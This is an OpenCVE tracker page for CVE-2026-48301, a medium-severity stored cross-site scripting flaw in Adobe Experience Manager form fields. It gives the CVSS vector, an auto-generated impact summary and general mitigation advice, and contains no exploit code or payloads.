Description
Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.
Published: 2026-06-09
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross‑site scripting flaw allows a low‑privileged user to inject malicious JavaScript into form fields that are rendered in the victim’s browser. The input is saved and later displayed without proper output encoding, enabling script execution that can lead to information theft, session hijacking, or defacement. The weakness is identified as input validation and output encoding failure, categorized as CWE‑79.

Affected Systems

Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and all earlier releases are affected. The vulnerability resides in the form handling component that accepts input from users with low privileges.

Risk and Exploitability

The CVSS score of 5.4 indicates moderate severity. No EPSS score is available, and the vulnerability is not listed in CISA KEV, implying limited widespread exploitation reports. The likely attack vector is a trusted form submission page where a low‑privileged attacker can supply malicious input; if the application fails to sanitize and encode that input, the JavaScript will execute when the page is viewed by another user. The scope change suggests that the impact could extend beyond a single resource, potentially affecting the entire application context.

Generated by OpenCVE AI on June 9, 2026 at 20:42 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Obtain and apply the official Adobe Experience Manager security update that addresses the stored XSS flaw as detailed in the Adobe Security Advisory.
  • If no patch is immediately available, enforce strict input validation on all form fields and ensure that any user‑supplied data is output‑escaped before rendering in browsers.
  • Restrict form access to only necessary roles and monitor for anomalous activity from low‑privileged accounts until a remediation is applied.

Generated by OpenCVE AI on June 9, 2026 at 20:42 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 10 Jun 2026 00:15:00 +0000

Type Values Removed Values Added
First Time appeared Adobe
Adobe adobe Experience Manager
Vendors & Products Adobe
Adobe adobe Experience Manager

Tue, 09 Jun 2026 17:15:00 +0000

Type Values Removed Values Added
Description Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.
Title Adobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Subscriptions

Adobe Adobe Experience Manager
cve-icon MITRE

Status: PUBLISHED

Assigner: adobe

Published:

Updated: 2026-06-09T16:48:25.292Z

Reserved: 2026-05-21T15:28:38.135Z

Link: CVE-2026-48301

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Undergoing Analysis

Published: 2026-06-09T17:17:44.380

Modified: 2026-06-09T19:30:24.713

Link: CVE-2026-48301

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-10T00:00:10Z

Weaknesses